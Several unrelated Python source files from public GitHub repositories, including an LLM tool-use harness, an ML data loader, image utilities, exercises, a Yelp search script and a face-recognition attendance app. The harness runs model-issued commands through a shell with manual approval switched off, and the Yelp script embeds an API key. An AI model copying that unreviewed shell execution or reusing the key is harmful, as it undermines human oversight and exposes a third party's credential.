1","repo_name":"GaryBall1997/STATS101B_data_collection","sub_path":"thread_class.py","file_name":"thread_class.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36885198440","text":"# some code parts are based on the functions provided by the repo:\n# https://github.com/d3n7/GPT-4-Unlimited-Tools\n\nimport argparse\n# import openai\nimport regex\nimport re\nimport pandas as pd\nimport subprocess\nfrom getpass import getpass\nimport pandas as pd\nimport os\nfrom tqdm import tqdm\nimport time\nfrom random import random, uniform\nimport random as rd\nimport torch.nn as nn\nimport json\nimport warnings\nimport numpy as np\nfrom call_interpreter import ask_model\nrd.seed(0000)\n\nparser = argparse.ArgumentParser(description='Process Arguments')\t\nparser.add_argument('--model', type=str, default='gpt-4', help='model name')\t\nparser.add_argument('--func_category', type=str, default='numeric', help='function category')\t\nparser.add_argument('--debug', action='store_true', help='debug mode, print dialogues to screan', default=False)\nparser.add_argument('--dataset_path', type=str, default='./results/', help='a path to save the model outputs')\t\nparser.add_argument('--function_path', type=str, default='../find_dataset/', help='path to the gt functions')\t\nparser.add_argument('--temp_function_path', type=str, default='./temp/', help='path to copy the gt functions')\t\nparser.add_argument('--prompt_path', type=str, default='./prompts/numeric.txt', help='path to prompt to use')\t\nparser.add_argument('--n_func', type=int, default=5, help='specify the amount of functions to run')\t\nparser.add_argument('--vicuna_server', type=str, help='specify vicuna server address')\t\nparser.add_argument('--vicuna_server_module', type=str, help='specify vicuna server address for the backbone model')\t\nparser.add_argument('--llama_hf_path', type=str, help='specify llama path')\t\nparser.add_argument('--hints', action='store_true', help='add_search_initializations', default=False)\nparser.add_argument('--single_round', action='store_true', help='add_search_initializations', default=False)\nargs = parser.parse_args()\n\nregx = [r\"([A-Z]+\\(((?:[^()\\\"']|(?:\\\"[^\\\"]*\\\")|(?:'[^']*')|\\((?1)*\\))*)\\))\",\n r'''(?:\"(?:[^\"\\\\]|\\\\.)*\"|'(?:[^'\\\\]|\\\\.)*'|\\b[^,]+)''']\n\nvicuna_server = args.vicuna_server\nvicuna_server_module = args.vicuna_server_module\n\nclass SessionState:\n def __init__(self):\n self.running = False\n self.followup = False\n self.prompt = ''\n self.command = ''\n self.acceptreject = False\n self.history = []\n self.totalCost = 0\n self.displayChat = False\n self.displayCost = False\n\nnewSession = True\nmanualApproval = False\n\ndef followup(state):\n state.followup, state.running = True, True\n\ndef formatTable(table):\n lines = ''\n for x, i in enumerate(table['GPT Commands']):\n lines += '{} - {}\\n'.format(table['GPT Commands'][x],table['GPT Explanations'][x])\n return(lines)\n\ndef formatTable_CommandOnly(table):\n lines = ''\n for x, i in enumerate(table['GPT Commands']):\n lines += '{} - {}\\n'.format(table['GPT Commands'][x],table['GPT Explanations'][x])\n return(lines)\n\ncommandTable = pd.DataFrame({\n 'GPT Commands': ['PYTHON(function.py)'],\n 'GPT Explanations': ['Run a python script with the given file name. Use quotes for the filename argument. Do not use quotes in the function command itself.'],\n 'Raw Translation': ['python {}']\n})\n\n# return the prompt according to the task\ndef return_sysPrompt(model):\n if model in ['llama-2']:\n sysPrompt = 'You now have the ability to execute commands to run external functions. ' \\\n 'You are able to access the user\\'s machine with these commands. In every message you send, ' \\\n 'include \"COMMAND: \" with your command at the end. Here is a list of commands with ' \\\n 'explanations of how they are used:\\n{}\\nWhen you use a command, the user will respond ' \\\n 'with \"Response: \" followed by the output of the commmand. Use this output to help the ' \\\n 'user complete their request. After you receive a task from the user, you must execute {} ' \\\n 'to run the external function. You will then receive outputs from the external function to ' \\\n 'analyze. You must only analyze outputs produced by the function when you run {}. Do not run ' \\\n 'the function any other way. Do not analyze any other outputs besides the ones produced by running {}.'\n else:\n sysPrompt = 'You now have access to some commands to help complete the user\\'s request. ' \\\n 'You are able to access the user\\'s machine with these commands. In every message you send, ' \\\n 'include \"COMMAND: \" with your command at the end. Here is a list of commands with ' \\\n 'explanations of how they are used:\\n{}\\nWhen you use a command, the user will respond ' \\\n 'with \"Response: \" followed by the output of the commmand. Use this output to help the ' \\\n 'user complete their request.' \n return sysPrompt\n\ndef runCmd(flag,state):\n if flag:\n try:\n p = subprocess.Popen(state.command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n output, errors = p.communicate()\n state.prompt = 'Response: ' + output.decode(\"utf-8\")\n # if errors:\n # state.prompt += 'Error occurred, please try again (some of the input values might be undefined)'\n # state.prompt += 'Errors: ' + errors.decode(\"utf-8\")\n except subprocess.CalledProcessError as e:\n print('!!!ERROR!!!')\n print(e)\n # state.prompt = 'Response: ' + e.output.decode(\"utf-8\")\n else:\n state.prompt = \"Response: User rejected this command\"\n followup(state)\n\ndef define_prompt(prompt_template,dir2func):\n prompt = prompt_template.format(DIR2FUNC=os.path.join(dir2func))\n return prompt\n\ndef save_description(response, filepath):\n description = response.rsplit('[DESCRIPTION]: ')[-1]\n description = description.rsplit('[DOMAIN]: ')[0]\n description = description.rsplit('[CODE]: ')[0]\n with open(filepath,'w') as f:\n f.write(description) \n f.close() \n\ndef save_domain(response,filepath):\n domain = response.rsplit('[DOMAIN]: ')[-1]\n domain = domain.rsplit('[CODE]: ')[0]\n with open(filepath,'w') as f:\n f.write(domain) \n f.close()\n\ndef save_code(response,filepath):\n code = response.rsplit('[CODE]:')[-1]\n if code.find('```python') != -1:\n code = code.rsplit('```python')[-1]\n code = code.rsplit('```')[0]\n elif code.find('``` python') != -1:\n code = code.rsplit('``` python')[-1]\n code = code.rsplit('```')[0]\n elif code.find('```') != -1:\n code = code.rsplit('```',maxsplit=2)[1]\n else:\n code = ''\n \n with open(filepath,'w') as f:\n f.write(code) \n f.close()\n\ndef save_fullhistory(history,filepath):\n with open(filepath+'.txt', 'a') as f:\n for i in history:\n if i['role'] == 'user':\n f.write('\\nuser:\\n'+i['content'])\n elif i['role'] == 'assistant':\n f.write('\\nassistant:\\n'+i['content'])\n with open(filepath+'.json', 'w') as file:\n json.dump(history, file)\n f.close()\n\n\ndef interp_func(prompt,model,debug=False, single_round=False):\n state = SessionState()\n sysPrompt = return_sysPrompt(model)\n round_count = 0\n while True:\n state.running = True\n if state.running:\n state.running = False \n if not state.followup:\n state.prompt = prompt\n if (newSession or state.history == []) and (not state.followup):\n if 'llama' in model:\n state.history = [{'role': 'system', 'content': sysPrompt.format(formatTable(commandTable),formatTable_CommandOnly(commandTable),formatTable_CommandOnly(commandTable),formatTable_CommandOnly(commandTable))}]\n else:\n state.history = [{'role': 'system', 'content': sysPrompt.format(formatTable(commandTable))}]\n else:\n if 'llama' in model:\n state.history[0] = {'role': 'system', 'content': sysPrompt.format(formatTable(commandTable),formatTable_CommandOnly(commandTable),formatTable_CommandOnly(commandTable),formatTable_CommandOnly(commandTable))}\n else:\n state.history[0] = {'role': 'system', 'content': sysPrompt.format(formatTable(commandTable))}\n state.followup = False \n response,state = ask_model(state.prompt, model, state, vicuna_server)\n if len(regex.findall(regx[0], response)) >= 1:\n cmd = regex.findall(regx[0], response)[0][0]\n pIndex = cmd.index('(')\n stem = cmd[:pIndex]\n rawArgs = cmd[pIndex+1:][:-1]\n cmdId = -1\n\n for x, i in enumerate(commandTable['GPT Commands']):\n if stem in i:\n cmdId = x\n break\n\n rawArgs.replace('\\n', '\\\\n')\n rawArgs.replace('\\\\\\n', '\\\\n')\n if cmdId == -1:\n state.prompt = 'Response: Unrecognized command'\n followup(state)\n elif \"'''\" in rawArgs:\n state.prompt = 'Response: Error parsing multi-line string (\\'\\'\\') Use a single line with escaped newlines instead (\")'\n followup(state)\n elif '\"\"\"' in rawArgs:\n state.prompt = 'Response: Error parsing multi-line string (\\\"\\\"\\\") Use a single line with escaped newlines instead (\")'\n followup(state)\n else:\n state.command = commandTable['Raw Translation'][cmdId]\n args = []\n if rawArgs != '':\n args = re.findall(regx[1], rawArgs) #[rawArgs]\n state.command = state.command.format(*args)\n\n singleQuotes = False\n for i in args:\n if i.startswith(\"'\"):\n singleQuotes = True\n state.prompt = \"Response: Error parsing argument in single quotes. Use double quotes around the argument instead\"\n followup(state)\n break\n\n if not singleQuotes:\n if manualApproval:\n state.acceptreject = False\n else:\n runCmd(1,state)\n\n round_count+=1\n \n if state.acceptreject:\n print('GPT is trying to run the following command: ' + state.command + '\\nPlease accept or reject this request.')\n decision = input('Accept or Reject [Accept, Reject]:')\n if decision.lower() == 'accept':\n state.acceptreject = False\n runCmd(1,state)\n elif decision.lower() == 'reject':\n state.acceptreject = False\n runCmd(0,state)\n\n \n if \"[DESCRIPTION]\" in response or (single_round and round_count==2):\n if debug:\n print(response) \n return(response,state.history) \n\n if round_count>20:\n # raise Warning(\"Interpretation process exceeded 100 rounds\")\n return('','') \n\n if debug:\n print(response) \n print(state.prompt) \n \ndef copy_func(source,target,category,vicuna_server_module=None,llama_hf_path=None):\n func_name = 'function_code.py'\n if 'numeric' in args.func_category:\n if os.path.exists(f'{source}/mlp_approx_model.pt'):\n os.system(f'scp {source}/mlp_approx_model.pt {target}/mlp_approx_model.pt')\n if ('neurons_entities' in category) or ('neurons_relations' in category):\n temp = open(f'{source}/{func_name}','r').read()\n temp = temp.replace('{API_BASE}',f\"'{vicuna_server_module}'\")\n temp = temp.replace('{LLAMA_PATH}',f\"'{llama_hf_path}'\")\n open(target+'/function.py','w').write(temp)\n else:\n os.system(f'scp {source}/{func_name} {target}/function.py')\n return\n\n\ndef remove_func(target):\n os.system(f'rm {target}')\n\ndef remove_temp_folder(target):\n os.system(f'rm -r {target}')\n\n\ndef main(args):\n with open(args.prompt_path,'r') as f:\n prompt_template = f.read()\n # os.mkdir(os.path.join(args.dataset_path,args.model,args.func_category))\n t_start = time.time()\n count = 0 \n remove_temp_folder(args.temp_function_path)\n os.makedirs(args.temp_function_path, exist_ok=True)\n for function in tqdm(os.listdir(args.function_path+args.func_category)): \n print(function)\n if count >= args.n_func: break\n if not os.path.os.path.exists(os.path.join(args.function_path,args.func_category,function,'function_code.py')): continue\n path2save = os.path.join(args.dataset_path,args.model,args.func_category,function)\n if args.hints:\n path2save = os.path.join(args.dataset_path,args.model,args.func_category+'_hints',function)\n if args.single_round:\n path2save = os.path.join(args.dataset_path,args.model,args.func_category+'_single_round',function)\n if os.path.exists(path2save+'/description.txt'): continue\n if os.path.isfile(path2save): continue\n \n os.makedirs(path2save, exist_ok=True)\n mlp_flag = False\n if 'numeric' in args.func_category:\n if int(function[1:]) < 150:\n mlp_flag = True\n copy_func(source=os.path.join(args.function_path,args.func_category,function),target=args.temp_function_path,category=args.func_category,vicuna_server_module=args.vicuna_server_module,llama_hf_path=args.llama_hf_path)\n prompt = define_prompt(prompt_template,args.temp_function_path+'function.py')\n if args.hints:\n initial = open(os.path.join(args.function_path,args.func_category,function,'initial.json'),'r').read()\n prompt += f'\\nWe advise you to start with the following words: {initial}'\n if args.single_round:\n initial = open(os.path.join(args.function_path,args.func_category,function,'initial.json'),'r').read()\n prompt += f'\\nWe advise you to start with the following words: {initial}'\n if mlp_flag:\n prompt_path_mlp = args.prompt_path.replace('numeric','numeric_mlp')\n with open(prompt_path_mlp,'r') as f:\n prompt_template_mlp = f.read()\n prompt = define_prompt(prompt_template_mlp,args.temp_function_path+'function.py')\n if args.debug:\n print(prompt)\n interp_count = 0\n while True:\n try:\n interp_count+=1\n response,history = interp_func(prompt,args.model,args.debug, args.single_round)\n break\n except Exception as e:\n print(e)\n if interp_count>5:\n break\n save_fullhistory(history,path2save+'/history')\n save_description(response,path2save+'/description.txt')\n if ('numeric' in args.func_category) or ('neurons' in args.func_category):\n save_domain(response,path2save+'/domain.txt')\n if 'numeric' in args.func_category or ('strings' in args.func_category):\n save_code(response,path2save+'/code.py')\n if mlp_flag:\n os.system(f'rm {args.temp_function_path}/mlp_approx_model.pt')\n remove_func(args.temp_function_path+'function.py')\n count+=1\n \n t_end = time.time()\n print(f'total time for {count} functions: {t_end-t_start}')\n remove_temp_folder(args.temp_function_path)\n\nif __name__ == '__main__':\n main(args)\n\n\n\n","repo_name":"multimodal-interpretability/FIND","sub_path":"src/run_interpretations/collect_interpretations.py","file_name":"collect_interpretations.py","file_ext":"py","file_size_in_byte":15683,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"7"} +{"seq_id":"40662466849","text":"import tensorflow as tf\n\n# In the batch process, the data set is divided into parts according to the value determined as the batch value\n# and the training of the model is carried out on this part in each iteration.\ndef prepare_batch(x_batch, y_batch):\n \n atom_features, bond_features, pair_indices = x_batch\n\n num_atoms = atom_features.row_lengths()\n num_bonds = bond_features.row_lengths()\n\n molecule_indices = tf.range(len(num_atoms))\n molecule_indicator = tf.repeat(molecule_indices, num_atoms)\n\n\n \n gather_indices = tf.repeat(molecule_indices[:-1], num_bonds[1:])\n increment = tf.cumsum(num_atoms[:-1])\n increment = tf.pad(tf.gather(increment, gather_indices), [(num_bonds[0], 0)])\n pair_indices = pair_indices.merge_dims(outer_axis=0, inner_axis=1).to_tensor()\n pair_indices = pair_indices + increment[:, tf.newaxis]\n atom_features = atom_features.merge_dims(outer_axis=0, inner_axis=1).to_tensor()\n bond_features = bond_features.merge_dims(outer_axis=0, inner_axis=1).to_tensor()\n\n\n return (atom_features, bond_features, pair_indices, molecule_indicator), y_batch\n\n# Now, we pass the function defined above to the map() function in the return statement of the function below\n# similar to the decorator design pattern here, so that the X, y parameters are passed to the prepare_batch() function. \n# so we can use the function to get our dataset in the future\ndef MPNNDataset(X, y, batch_size=32, shuffle=False):\n dataset = tf.data.Dataset.from_tensor_slices((X, (y)))\n if shuffle:\n dataset = dataset.shuffle(1024)\n return dataset.batch(batch_size).map(prepare_batch, -1).prefetch(-1)","repo_name":"McahitKutsal/covid-19-drug-interaction-paper","sub_path":"data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"7496006878","text":"# Script to transform image to polar coordinate\n# Only run from PCs\nimport argparse\nimport cv2\nimport numpy as np\nfrom classes.emulate import *\n\n# Cut image to square\ndef square_img(img):\n\tw,h = img.shape[0],img.shape[1]\n\tnew_half = int(max(w,h)/2)\n\ttemp_img = np.zeros((2*new_half,2*new_half,3))\n\ttemp_img[new_half-int(w/2):new_half+int(w/2),new_half-int(h/2):new_half+int(h/2),:] = img[:2*int(w/2),:2*int(h/2)]\n\treturn temp_img\n\ndef cart2polar(image_path, output_path):\n\n\t# read image from image_path and cut image to square\n\tsource = cv2.imread(image_path)\n\timg = source.astype(np.float32)\n\timg = square_img(img)\n\n\t# Polarize image\n\tradius = np.sqrt(((img.shape[0]/2.0)**2.0)+((img.shape[1]/2.0)**2.0))\n\tpolar_image = cv2.linearPolar(img,(img.shape[0]/2, img.shape[1]/2), radius, cv2.WARP_FILL_OUTLIERS)\n\n\t# write image\n\tcv2.imwrite(output_path, polar_image)\n\t\n\treturn img, polar_image\n\nif __name__ == '__main__':\n\tfrom run_emulate import *\n\t\n\t# Arguments\n\targs = argparse.ArgumentParser(description=\"Image input and output\")\n\targs.add_argument('-i','--input', default='1.jpg', type=str, help='Input image path to transformed')\n\targs.add_argument('-o','--output', default='transform_1.jpg', type=str, help='Transformed image path to output')\n\targs = args.parse_args()\n\n\toriginal_img, polar_image = cart2polar('images/'+args.input, 'images/'+args.output)","repo_name":"reggiehsu111/led_strip","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42668068978","text":"\"\"\"CS 108 Lab 5.0\n\nThis application takes two user input integers and prints increments\nof 10 from the first integer until the value is less than or equal\nto the second integer.\n\n@author: Sam Hoogewind (sth6)\n@date: Fall, 2020\n\"\"\"\n\n# Prompt the user for 2 integers\nnum1 = int(input())\nnum2 = int(input())\n\n# Print every increment of 10 in the range of the first integer\n# to the second\nif num1 <= num2:\n for x in range(num1, num2 + 1, 10):\n print(x)\n\n# If the second integer is bigger, print an error\nelse:\n print(\"Second integer can't be less than the first.\")\n ","repo_name":"samhoog/cs108","sub_path":"lab5/range_practice.py","file_name":"range_practice.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1516621133","text":"from collections import Counter\na='''0: 3\n1: 2\n2: 4\n4: 4\n6: 5\n8: 6\n10: 8\n12: 8\n14: 6\n16: 6\n18: 8\n20: 8\n22: 6\n24: 12\n26: 9\n28: 12\n30: 8\n32: 14\n34: 12\n36: 8\n38: 14\n40: 12\n42: 12\n44: 12\n46: 14\n48: 12\n50: 14\n52: 12\n54: 10\n56: 14\n58: 12\n60: 14\n62: 14\n66: 10\n68: 14\n74: 14\n76: 12\n78: 14\n80: 20\n86: 18\n92: 14\n94: 20\n96: 18\n98: 17'''\n# a='''0: 3\n# 1: 2\n# 4: 4\n# 6: 4'''\nmaxes = Counter()\nfor i in a.split(\"\\n\"):\n cur = i.split(\": \")\n maxes[int(cur[0])] = int(cur[1])\nprint(maxes)\nposes = Counter()\ndirections = Counter()\nfor i in range(max(list(maxes.keys()))+1):\n if i not in maxes:\n maxes[i] = 0\n else:\n directions[i] = 1\n poses[i] = 0\n\n# maxes.sort()\n# print(maxes)\nprint(poses)\ncurX = 0\ncurY = 0\ntimestep = 0\nhitSpots = []\ncaught = True\nwhile caught or curX != max(list(poses.keys())) + 1:\n moved = False\n # if not caught:\n # curX += 1\n # print(\"new curX\", curX)\n # moved = True\n # if timestep == 0:\n if not caught:\n curX += 1\n print(\"new curX\", curX)\n\n if maxes[curX] != 0 and poses[curX] == curY:\n caught = True\n print(\"caught and added\", curX, maxes[curX])\n hitSpots.append(curX * maxes[curX])\n else:\n caught = False\n\n # if not caught:\n # curX += 1\n # print(\"new curX\", curX)\n\n # if maxes[curX] != 0 and poses[curX] == curY:\n # caught = True\n # print(\"caught and added\", curX, maxes[curX])\n # hitSpots.append(curX * maxes[curX])\n # else:\n # caught = False\n caught = False\n \n\n # if not caught:\n\n # if poses[curX] == curY:\n\n for i in poses:\n if maxes[i] != 0:\n if poses[i] + directions[i] >= maxes[i]:\n directions[i] = -directions[i]\n elif poses[i] + directions[i] < 0:\n directions[i] = -directions[i]\n \n poses[i] += directions[i]\n\n timestep += 1\n print(\"curX\", curX)\n print(\"poses\", poses)\n\n# print(maxes)\nprint(hitSpots)\nprint(sum(hitSpots))\n#part 1 done in 51:11 due to error in bouncing code","repo_name":"Goldenlion5648/AdventOfCode2017","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13021092179","text":"import numpy as np\n\n# Define the EULER solver function\ndef EULER(derivative, R, t, h, Iext, Istim, Isyn):\n \"\"\"\n Computes the next value of the neural activity R using the Euler method.\n\n Parameters\n ----------\n derivative : function\n The derivative function that computes the rate of change of R with respect to time.\n R : int, float, or ndarray\n The current value of R.\n t : int or float\n The current time.\n h : int or float\n The time step.\n Iext : int or float\n External input.\n Istim : int or float\n Stimulus input.\n Isyn : int, float, or ndarray\n Synaptic input.\n\n Returns\n -------\n int, float, or ndarray\n The next value of R.\n \"\"\"\n return R + h * derivative(t + h, R, Iext, Istim, Isyn)\n\n\n# Define the RK4 solver function\ndef RK4(derivative, R, t, h, Iext, Istim, Isyn):\n \"\"\"\n Computes the next value of the neural activity R using the fourth-order Runge-Kutta method.\n\n Parameters\n ----------\n derivative : function\n The derivative function that computes the rate of change of R with respect to time.\n R : int, float, or ndarray\n The current value of R.\n t : int or float\n The current time.\n h : int or float\n The time step.\n Iext : int or float\n External input.\n Istim : int or float\n Stimulus input.\n Isyn : int, float, or ndarray\n Synaptic input.\n\n Returns\n -------\n int, float, or ndarray\n The next value of R.\n \"\"\"\n k1 = derivative(t, R, Iext, Istim, Isyn)\n k2 = derivative(t + h / 2, R + k1 / 2, Iext, Istim, Isyn)\n k3 = derivative(t + h / 2, R + k2 / 2, Iext, Istim, Isyn)\n k4 = derivative(t + h, R + k3, Iext, Istim, Isyn)\n return R + (h / 6) * (k1 + 2 * k2 + 2 * k3 + k4)\n\n\ndef config_simulation(integration, tsim, h):\n \"\"\"\n Configure a simulation of a dynamical system with a specified integration method.\n\n Args:\n - integration: str, the name of the integration method to use; either \"euler\" or \"rk4\"\n - tsim: float, the total simulation time in seconds\n - h: float, the time step size in seconds\n\n Returns:\n - fint: callable, the integration function corresponding to the specified integration method\n - steps: int, the number of time steps in the simulation\n - times: numpy.ndarray, an array of times corresponding to each time step in the simulation\n \"\"\"\n assert integration in [\"euler\", \"rk4\"]\n\n # Get integration function\n fint = dict(euler=EULER, rk4=RK4)[integration]\n\n tinit = 0.0\n # Number of time steps\n steps = int((tsim - tinit) / h) # Number of steps\n times = np.linspace(tinit, tsim, steps)\n\n return fint, steps, times\n","repo_name":"brainets/IPP_PAPER","sub_path":"src/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33412147510","text":"#!/usr/bin/env python3\n\n\"\"\"\nSend contents to server.\n\"\"\"\n\nfrom subprocess import check_call\nfrom urllib.parse import urljoin\nfrom shlex import split\nimport argparse\nimport logging\n\n\nfrom conf import __version__ as VERSION\n\nDOC_DESTINATION = (\"/dev/null\")\n\n\ndef norm_perms():\n \"\"\"\n Normalize permissions in the build directory.\n \"\"\"\n cmd = split(\"find _build/html/ -type d -exec chmod o+x '{}' ';'\")\n check_call(cmd)\n cmd = split(\"chmod -R o+r _build/html/\")\n check_call(cmd)\n\n\ndef send_static(destination=DOC_DESTINATION):\n \"\"\"\n Send static site on server.\n \"\"\"\n logger = logging.getLogger(__name__)\n cmd = split(\"rsync -av _build/html/\")\n dest = urljoin(destination, VERSION)\n logger.info(\"Sending documentation to %s\", dest)\n cmd += [dest]\n check_call(cmd)\n\n\ndef main():\n \"\"\"\n Command line entry point.\n \"\"\"\n logging.basicConfig(level=logging.DEBUG)\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--destination',\n action='store',\n default=DOC_DESTINATION,\n help=\"Where the static version of the documentation \"\n \"will be sent, \"\n \"default={}\".format(DOC_DESTINATION))\n args = parser.parse_args()\n norm_perms()\n send_static(destination=args.destination)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"crim-ca/Service","sub_path":"docs/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"72936547104","text":"import requests\n\nurl = \"https://api.yelp.com/v3/businesses/search\"\napi_key = \"8gxaaO6mptFNjNnoPCP0_lyjlK7VnkpH0QLNncycGCvk44X-MxrEKOPa0l_LUT1WcaztHeyc8rddihg4_OrPEwWIiBcl1OsrqsKTG9R0_AqczdPKv9J-LUAvsLbvZHYx\"\nheaders = {\n \"Authorization\": \"Bearer \" + api_key\n}\nparams = {\n \"term\": \"Barber\",\n \"location\": \"NYC\",\n}\nresponse = requests.get(url, headers=headers, params=params)\nbusinesses = response.json()[\"businesses\"]\n\nnames = [business[\"name\"]\n for business in businesses if business[\"rating\"] > 4.5]\n\n\nprint(names)\n","repo_name":"VelasquezTracy25/python","sub_path":"HelloWorld/python_packages/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16374072269","text":"# Exercício Python 084: Faça um programa que leia nome e peso de várias pessoas,\n# guardando tudo em uma lista. No final, mostre:\n# A) Quantas pessoas foram cadastradas.\n# B) Uma listagem com as pessoas mais pesadas.\n# C) Uma listagem com as pessoas mais leves.\n\nnome = []\npeso = []\nwhile True:\n n = str(input('Nome: '))\n p = int(input('Peso: '))\n nome.append(n)\n\n resp = str(input('Quer continuar [S/N]? ')).strip()\n if resp in 'Nn':\n break\nprint(nome)\n","repo_name":"Emerson007700/Python_exercicios","sub_path":"ex_84.py","file_name":"ex_84.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"36079677874","text":"#Sắp xếp lại công việc theo thời gian giảm dần\r\ndef sort_works(a = [],b = []):\r\n for i in range(len(a)):\r\n for j in range(i+1,len(a)):\r\n if a[i] 0):\r\n (x, y, w, h) = detections[0]\r\n frame = cv.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n\r\n cv.imshow('Face Detection', frame)\r\n\r\n if cv.waitKey(1) & 0xFF == ord('d'):\r\n break\r\n\r\n capture.release()\r\n cv.destroyAllWindows()\r\n\r\n\r\ndef face_Recognition():\r\n upload2()\r\n\r\n path = 'Face_Recognition/images'\r\n images = []\r\n names = []\r\n myList = os.listdir(path)\r\n\r\n for i in myList:\r\n currentImg = cv.imread(f'{path}/{i}')\r\n images.append(currentImg)\r\n names.append(os.path.splitext(i)[0])\r\n\r\n def encodings(images):\r\n encoding_list = []\r\n for i in images:\r\n i = cv.cvtColor(i, cv.COLOR_BGR2RGB)\r\n encode = fr.face_encodings(i)[0]\r\n encoding_list.append(encode)\r\n return encoding_list\r\n\r\n encoding_list_known = encodings(images)\r\n\r\n capture = cv.VideoCapture(0)\r\n\r\n while True:\r\n isTrue, frame = capture.read()\r\n\r\n frame_small = cv.resize(frame, (0, 0), None, 0.25, 0.25)\r\n frame_small = cv.cvtColor(frame_small, cv.COLOR_BGR2RGB)\r\n\r\n face_loc_frame = fr.face_locations(frame_small)\r\n encode_frame = fr.face_encodings(frame_small, face_loc_frame)\r\n\r\n for encodeFace, locFace in zip(encode_frame, face_loc_frame):\r\n matches = fr.compare_faces(encoding_list_known, encodeFace)\r\n faceDis = fr.face_distance(encoding_list_known, encodeFace)\r\n\r\n matchIndex = np.argmin(faceDis)\r\n\r\n if matches[matchIndex]:\r\n name = names[matchIndex].upper()\r\n y1, x2, y2, x1 = locFace\r\n y1, x2, y2, x1 = y1*4, x2*4, y2*4, x1*4\r\n\r\n cv.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 2)\r\n cv.rectangle(frame, (x1, y2+37), (x2, y2), (0, 255, 0), -1)\r\n cv.putText(frame, name, (x1+6, y2+30),\r\n cv.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 2)\r\n\r\n cv.imshow('Face Recognition', frame)\r\n if cv.waitKey(1) & 0xFF == ord('d'):\r\n break\r\n\r\n capture.release()\r\n cv.destroyAllWindows()\r\n\r\n\r\ndef mark_Attendance():\r\n upload3()\r\n\r\n path = 'Mark_Attendance/images'\r\n images = []\r\n names = []\r\n myList = os.listdir(path)\r\n\r\n for i in myList:\r\n currentImg = cv.imread(f'{path}/{i}')\r\n images.append(currentImg)\r\n names.append(os.path.splitext(i)[0])\r\n\r\n def markAttendance(name):\r\n with open('Attendance_Sheet.csv', 'r+') as f:\r\n myDataList = f.readlines()\r\n nameList = []\r\n for line in myDataList:\r\n entry = line.split(',')\r\n nameList.append(entry[0])\r\n if name not in nameList:\r\n now = datetime.now()\r\n dtString = now.strftime('%H:%M:%S')\r\n f.writelines(f'\\n{name},{dtString}')\r\n\r\n def encodings(images):\r\n encoding_list = []\r\n for i in images:\r\n i = cv.cvtColor(i, cv.COLOR_BGR2RGB)\r\n encode = fr.face_encodings(i)[0]\r\n encoding_list.append(encode)\r\n return encoding_list\r\n\r\n encoding_list_known = encodings(images)\r\n\r\n capture = cv.VideoCapture(0)\r\n\r\n while True:\r\n isTrue, frame = capture.read()\r\n\r\n frame_small = cv.resize(frame, (0, 0), None, 0.25, 0.25)\r\n frame_small = cv.cvtColor(frame_small, cv.COLOR_BGR2RGB)\r\n\r\n face_loc_frame = fr.face_locations(frame_small)\r\n encode_frame = fr.face_encodings(frame_small, face_loc_frame)\r\n\r\n for encodeFace, locFace in zip(encode_frame, face_loc_frame):\r\n matches = fr.compare_faces(encoding_list_known, encodeFace)\r\n faceDis = fr.face_distance(encoding_list_known, encodeFace)\r\n\r\n matchIndex = np.argmin(faceDis)\r\n\r\n if matches[matchIndex]:\r\n name = names[matchIndex].upper()\r\n y1, x2, y2, x1 = locFace\r\n y1, x2, y2, x1 = y1*4, x2*4, y2*4, x1*4\r\n\r\n cv.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 2)\r\n cv.rectangle(frame, (x1, y2+37), (x2, y2), (0, 255, 0), -1)\r\n cv.putText(frame, name, (x1+6, y2+30),\r\n cv.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 2)\r\n markAttendance(name)\r\n\r\n cv.imshow('Mark Attendance', frame)\r\n if cv.waitKey(1) & 0xFF == ord('d'):\r\n break\r\n\r\n capture.release()\r\n cv.destroyAllWindows()\r\n\r\n\r\ndef object_Detection():\r\n upload4()\r\n\r\n config_file = 'Object_Detection/ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt'\r\n frozen_model = 'Object_Detection/frozen_inference_graph.pb'\r\n\r\n model = cv.dnn_DetectionModel(frozen_model, config_file)\r\n\r\n classLabels = []\r\n file_name = 'Object_Detection/Labels.txt'\r\n with open(file_name, 'rt') as fpt:\r\n classLabels = fpt.read().rstrip('\\n').split('\\n')\r\n\r\n model.setInputSize(320, 320)\r\n model.setInputScale(1.0/127.5)\r\n model.setInputMean((127.5, 127.5, 127.5))\r\n model.setInputSwapRB(True)\r\n\r\n capture = cv.VideoCapture('Object_Detection/Object_Detection_Video.mp4')\r\n\r\n def rescaleFrame(frame, scale=0.25):\r\n width= int(frame.shape[1] * scale)\r\n height = int(frame.shape[0] * 